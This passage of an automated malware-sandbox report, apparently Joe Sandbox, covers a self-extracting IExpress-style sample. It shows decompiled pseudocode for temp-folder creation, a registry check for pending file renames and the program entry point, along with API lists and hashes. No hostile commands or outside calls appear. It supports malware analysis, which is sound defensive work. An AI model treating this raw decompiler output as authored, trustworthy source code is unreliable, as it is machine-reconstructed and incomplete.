                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                      • API String ID: 1082909758-2818522747
                                                                                                                                                                                                      • Opcode ID: 80580a54fa5849f7c393806a7e7842cc3aa658f30230abbbe753a7399993b0ff
                                                                                                                                                                                                      • Instruction ID: ece18ce5c1092fa07325d8e8ec39a53d95ef4baf60d9ad99f23fb400303573e5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80580a54fa5849f7c393806a7e7842cc3aa658f30230abbbe753a7399993b0ff
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96112371B0051477D720DB769C49FAF3A7EEFE2711F050169F647E2290CEB489838AA2
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 478 a65467-a65484 479 a6551c-a65528 call a61680 478->479 480 a6548a-a65490 call a653a1 478->480 483 a6552d-a65539 call a658c8 479->483 484 a65495-a65497 480->484 493 a6554d-a65552 483->493 494 a6553b-a65545 CreateDirectoryA 483->494 486 a65581-a65583 484->486 487 a6549d-a654c0 call a61781 484->487 488 a6558d-a6559d call a66ce0 486->488 495 a654c2-a654d8 GetSystemInfo 487->495 496 a6550c-a6551a call a6658a 487->496 500 a65554-a65557 call a6597d 493->500 501 a65585-a6558b 493->501 498 a65577-a6557c call a66285 494->498 499 a65547 494->499 502 a654fe 495->502 503 a654da-a654dd 495->503 496->483 498->486 499->493 509 a6555c-a6555e 500->509 501->488 510 a65503-a65507 call a6658a 502->510 507 a654f7-a654fc 503->507 508 a654df-a654e2 503->508 507->510 513 a654e4-a654e7 508->513 514 a654f0-a654f5 508->514 509->501 515 a65560-a65566 509->515 510->496 513->496 517 a654e9-a654ee 513->517 514->510 515->486 518 a65568-a65575 RemoveDirectoryA 515->518 517->510 518->486
                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E00A65467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t10;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				intOrPtr _t14;
                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                      				CHAR* _t48;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				intOrPtr _t61;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t10 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				if(__edx == 0) {
                                                                                                                                                                                                      					_t48 = 0xa691e4;
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E00A61680(0xa691e4, 0x104);
                                                                                                                                                                                                      					L14:
                                                                                                                                                                                                      					_t13 = E00A658C8(_t48); // executed
                                                                                                                                                                                                      					if(_t13 != 0) {
                                                                                                                                                                                                      						L17:
                                                                                                                                                                                                      						_t42 = _a4;
                                                                                                                                                                                                      						if(_a4 == 0) {
                                                                                                                                                                                                      							L23:
                                                                                                                                                                                                      							 *0xa69124 = 0;
                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                      							L24:
                                                                                                                                                                                                      							return E00A66CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t16 = E00A6597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                      						if(_t16 != 0) {
                                                                                                                                                                                                      							goto L23;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t61 =  *0xa68a20; // 0x0
                                                                                                                                                                                                      						if(_t61 != 0) {
                                                                                                                                                                                                      							 *0xa68a20 = 0;
                                                                                                                                                                                                      							RemoveDirectoryA(_t48);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L22:
                                                                                                                                                                                                      						_t14 = 0;
                                                                                                                                                                                                      						goto L24;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                      						 *0xa69124 = E00A66285();
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *0xa68a20 = 1;
                                                                                                                                                                                                      					goto L17;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t42 =  &_v268;
                                                                                                                                                                                                      				_t20 = E00A653A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                      				if(_t20 == 0) {
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t48 = 0xa691e4;
                                                                                                                                                                                                      				E00A61781(0xa691e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                      				if(( *0xa69a34 & 0x00000020) == 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_t42 = 0x104;
                                                                                                                                                                                                      					E00A6658A(_t48, 0x104, 0xa61140);
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				GetSystemInfo( &_v304);
                                                                                                                                                                                                      				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					_push("i386");
                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                      					E00A6658A(_t48, 0x104);
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = _t26 - 1;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					_push("mips");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = _t28 - 1;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					_push("alpha");
                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t29 != 1) {
                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push("ppc");
                                                                                                                                                                                                      				goto L11;
                                                                                                                                                                                                      			}




















                                                                                                                                                                                                      0x00a65472
                                                                                                                                                                                                      0x00a65479
                                                                                                                                                                                                      0x00a65481
                                                                                                                                                                                                      0x00a65484
                                                                                                                                                                                                      0x00a6551c
                                                                                                                                                                                                      0x00a65521
                                                                                                                                                                                                      0x00a65528
                                                                                                                                                                                                      0x00a6552d
                                                                                                                                                                                                      0x00a6552f
                                                                                                                                                                                                      0x00a65539
                                                                                                                                                                                                      0x00a6554d
                                                                                                                                                                                                      0x00a6554d
                                                                                                                                                                                                      0x00a65552
                                                                                                                                                                                                      0x00a65585
                                                                                                                                                                                                      0x00a65585
                                                                                                                                                                                                      0x00a6558b
                                                                                                                                                                                                      0x00a6558d
                                                                                                                                                                                                      0x00a6559d
                                                                                                                                                                                                      0x00a6559d
                                                                                                                                                                                                      0x00a65557
                                                                                                                                                                                                      0x00a6555e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65560
                                                                                                                                                                                                      0x00a65566
                                                                                                                                                                                                      0x00a65569
                                                                                                                                                                                                      0x00a6556f
                                                                                                                                                                                                      0x00a6556f
                                                                                                                                                                                                      0x00a65581
                                                                                                                                                                                                      0x00a65581
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65581
                                                                                                                                                                                                      0x00a65545
                                                                                                                                                                                                      0x00a6557c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6557c
                                                                                                                                                                                                      0x00a65547
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65547
                                                                                                                                                                                                      0x00a6548a
                                                                                                                                                                                                      0x00a65490
                                                                                                                                                                                                      0x00a65497
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6549d
                                                                                                                                                                                                      0x00a654ab
                                                                                                                                                                                                      0x00a654b4
                                                                                                                                                                                                      0x00a654c0
                                                                                                                                                                                                      0x00a6550c
                                                                                                                                                                                                      0x00a65511
                                                                                                                                                                                                      0x00a65515
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65515
                                                                                                                                                                                                      0x00a654c9
                                                                                                                                                                                                      0x00a654d6
                                                                                                                                                                                                      0x00a654d8
                                                                                                                                                                                                      0x00a654fe
                                                                                                                                                                                                      0x00a65503
                                                                                                                                                                                                      0x00a65507
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a65507
                                                                                                                                                                                                      0x00a654da
                                                                                                                                                                                                      0x00a654dd
                                                                                                                                                                                                      0x00a654f7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a654f7
                                                                                                                                                                                                      0x00a654df
                                                                                                                                                                                                      0x00a654e2
                                                                                                                                                                                                      0x00a654f0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a654f0
                                                                                                                                                                                                      0x00a654e7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a654e9
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A654C9
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6553D
                                                                                                                                                                                                      • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6556F
                                                                                                                                                                                                        • Part of subcall function 00A653A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A653FB
                                                                                                                                                                                                        • Part of subcall function 00A653A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A65402
                                                                                                                                                                                                        • Part of subcall function 00A653A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6541F
                                                                                                                                                                                                        • Part of subcall function 00A653A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A6542B
                                                                                                                                                                                                        • Part of subcall function 00A653A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00A65434
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                      • API String ID: 1979080616-787463151
                                                                                                                                                                                                      • Opcode ID: 001843458fa19ba939393890f5319c431da48aaf85b99ac927c5fecbbb47d9f1
                                                                                                                                                                                                      • Instruction ID: 651379ba837f3247a6dccde168e3dbe081fc5444bc3a086104d5a5669d946168
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 001843458fa19ba939393890f5319c431da48aaf85b99ac927c5fecbbb47d9f1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1312771F00A106BCB149BB99D4997F77BFEB91740F18022AE803D3680DFB0CE428A91
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 519 a6256d-a6257d 520 a62622-a62627 call a624e0 519->520 521 a62583-a62589 519->521 526 a62629-a6262f 520->526 523 a6258b 521->523 524 a625e8-a62607 RegOpenKeyExA 521->524 525 a62591-a62595 523->525 523->526 527 a625e3-a625e6 524->527 528 a62609-a62620 RegQueryInfoKeyA 524->528 525->526 530 a6259b-a625ba RegOpenKeyExA 525->530 527->526 531 a625d1-a625dd RegCloseKey 528->531 530->527 532 a625bc-a625cb RegQueryValueExA 530->532 531->527 532->531
                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E00A6256D(signed int __ecx) {
                                                                                                                                                                                                      				int _v8;
                                                                                                                                                                                                      				void* _v12;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t24;
                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                      				int _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                      				_t31 = 0;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t31 = E00A624E0(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t34 = _t13 - 1;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						_v8 = 0;
                                                                                                                                                                                                      						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                      							_v8 = 0;
                                                                                                                                                                                                      							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                      							if(_t24 == 0) {
                                                                                                                                                                                                      								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                      								L6:
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                      								RegCloseKey(_v12); // executed
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							_t31 = _v8;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t31;
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x00a62572
                                                                                                                                                                                                      0x00a62573
                                                                                                                                                                                                      0x00a62575
                                                                                                                                                                                                      0x00a62578
                                                                                                                                                                                                      0x00a6257d
                                                                                                                                                                                                      0x00a62627
                                                                                                                                                                                                      0x00a62583
                                                                                                                                                                                                      0x00a62586
                                                                                                                                                                                                      0x00a62589
                                                                                                                                                                                                      0x00a625eb
                                                                                                                                                                                                      0x00a62607
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62609
                                                                                                                                                                                                      0x00a6261a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6261a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6258b
                                                                                                                                                                                                      0x00a6258b
                                                                                                                                                                                                      0x00a6259e
                                                                                                                                                                                                      0x00a625b2
                                                                                                                                                                                                      0x00a625ba
                                                                                                                                                                                                      0x00a625cb
                                                                                                                                                                                                      0x00a625d1
                                                                                                                                                                                                      0x00a625d6
                                                                                                                                                                                                      0x00a625da
                                                                                                                                                                                                      0x00a625dd
                                                                                                                                                                                                      0x00a625dd
                                                                                                                                                                                                      0x00a625e3
                                                                                                                                                                                                      0x00a625e3
                                                                                                                                                                                                      0x00a625e3
                                                                                                                                                                                                      0x00a6258b
                                                                                                                                                                                                      0x00a62589
                                                                                                                                                                                                      0x00a6262f
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00A64096,00A64096,?,00A61ED3,00000001,00000000,?,?,00A64137,?), ref: 00A625B2
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A64096,?,00A61ED3,00000001,00000000,?,?,00A64137,?,00A64096), ref: 00A625CB
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,00A61ED3,00000001,00000000,?,?,00A64137,?,00A64096), ref: 00A625DD
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00A64096,00A64096,?,00A61ED3,00000001,00000000,?,?,00A64137,?), ref: 00A625FF
                                                                                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00A64096,00000000,00000000,00000000,00000000,?,00A61ED3,00000001,00000000), ref: 00A6261A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager, xrefs: 00A625A8
                                                                                                                                                                                                      • PendingFileRenameOperations, xrefs: 00A625C3
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A625F5
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                      • API String ID: 2209512893-559176071
                                                                                                                                                                                                      • Opcode ID: 289ea3673d9a2790ce208c775f3b302b942fb9a97997723baecf74d7bc3cea4f
                                                                                                                                                                                                      • Instruction ID: 1e3c3f5b479771a48fb8b40f5430afe68c7b02dca6807136cfe30626d544f7c0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 289ea3673d9a2790ce208c775f3b302b942fb9a97997723baecf74d7bc3cea4f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3118F35A42228BBAB20DB91DC0DEFBBE7CEF117A1F114155F80AF2010DA745E45DBA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 533 a66a60-a66a91 call a67155 call a67208 GetStartupInfoW 539 a66a93-a66aa2 533->539 540 a66aa4-a66aa6 539->540 541 a66abc-a66abe 539->541 542 a66aaf-a66aba Sleep 540->542 543 a66aa8-a66aad 540->543 544 a66abf-a66ac5 541->544 542->539 543->544 545 a66ac7-a66acf _amsg_exit 544->545 546 a66ad1-a66ad7 544->546 547 a66b0b-a66b11 545->547 548 a66b05 546->548 549 a66ad9-a66ae9 call a66c3f 546->549 550 a66b13-a66b24 _initterm 547->550 551 a66b2e-a66b30 547->551 548->547 555 a66aee-a66af2 549->555 550->551 553 a66b32-a66b39 551->553 554 a66b3b-a66b42 551->554 553->554 556 a66b67-a66b71 554->556 557 a66b44-a66b51 call a67060 554->557 555->547 558 a66af4-a66b00 555->558 560 a66b74-a66b79 556->560 557->556 567 a66b53-a66b65 557->567 561 a66c39-a66c3e call a6724d 558->561 564 a66bc5-a66bc8 560->564 565 a66b7b-a66b7d 560->565 568 a66bd6-a66be3 _ismbblead 564->568 569 a66bca-a66bd3 564->569 570 a66b94-a66b98 565->570 571 a66b7f-a66b81 565->571 567->556 575 a66be5-a66be6 568->575 576 a66be9-a66bed 568->576 569->568 573 a66ba0-a66ba2 570->573 574 a66b9a-a66b9e 570->574 571->564 572 a66b83-a66b85 571->572 572->570 577 a66b87-a66b8a 572->577 578 a66ba3-a66bbc call a62bfb 573->578 574->578 575->576 576->560 580 a66c1e-a66c25 576->580 577->570 581 a66b8c-a66b92 577->581 578->580 586 a66bbe-a66bbf exit 578->586 583 a66c27-a66c2d _cexit 580->583 584 a66c32 580->584 581->572 583->584 584->561 586->564
                                                                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                                                                      			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int* _t25;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed char _t41;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				signed int _t58;
                                                                                                                                                                                                      				signed int _t59;
                                                                                                                                                                                                      				intOrPtr* _t60;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				E00A67155();
                                                                                                                                                                                                      				_push(0x58);
                                                                                                                                                                                                      				_push(0xa672b8);
                                                                                                                                                                                                      				E00A67208(__ebx, __edi, __esi);
                                                                                                                                                                                                      				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                      				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                      				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                      				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                      				_t53 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                      					if(0 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(0 != _t56) {
                                                                                                                                                                                                      						Sleep(0x3e8);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t58 = 1;
                                                                                                                                                                                                      						_t53 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_t67 =  *0xa688b0 - _t58; // 0x2
                                                                                                                                                                                                      					if(_t67 != 0) {
                                                                                                                                                                                                      						__eflags =  *0xa688b0; // 0x2
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							 *0xa681e4 = _t58;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0xa688b0 = _t58;
                                                                                                                                                                                                      							_t37 = E00A66C3F(0xa610b8, 0xa610c4); // executed
                                                                                                                                                                                                      							__eflags = _t37;
                                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                                      								goto L13;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                      								_t30 = 0xff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(0x1f);
                                                                                                                                                                                                      						L00A66FF4();
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						_t68 =  *0xa688b0 - _t58; // 0x2
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_push(0xa610b4);
                                                                                                                                                                                                      							_push(0xa610ac);
                                                                                                                                                                                                      							L00A67202();
                                                                                                                                                                                                      							 *0xa688b0 = 2;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(_t53 == 0) {
                                                                                                                                                                                                      							 *0xa688ac = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t71 =  *0xa688b4;
                                                                                                                                                                                                      						if( *0xa688b4 != 0 && E00A67060(_t71, 0xa688b4) != 0) {
                                                                                                                                                                                                      							_t60 =  *0xa688b4; // 0x0
                                                                                                                                                                                                      							 *0xa6a288(0, 2, 0);
                                                                                                                                                                                                      							 *_t60();
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t25 = __imp___acmdln; // 0x76665b9c
                                                                                                                                                                                                      						_t59 =  *_t25;
                                                                                                                                                                                                      						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t41 =  *_t59;
                                                                                                                                                                                                      							if(_t41 > 0x20) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							if(_t41 != 0) {
                                                                                                                                                                                                      								if(_t54 != 0) {
                                                                                                                                                                                                      									goto L32;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                      										_t59 = _t59 + 1;
                                                                                                                                                                                                      										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      										_t41 =  *_t59;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                      							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                      								_t29 = 0xa;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(_t29);
                                                                                                                                                                                                      							_t30 = E00A62BFB(0xa60000, 0, _t59); // executed
                                                                                                                                                                                                      							 *0xa681e0 = _t30;
                                                                                                                                                                                                      							__eflags =  *0xa681f8;
                                                                                                                                                                                                      							if( *0xa681f8 == 0) {
                                                                                                                                                                                                      								exit(_t30); // executed
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *0xa681e4;
                                                                                                                                                                                                      							if( *0xa681e4 == 0) {
                                                                                                                                                                                                      								__imp___cexit();
                                                                                                                                                                                                      								_t30 =  *0xa681e0; // 0x0
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
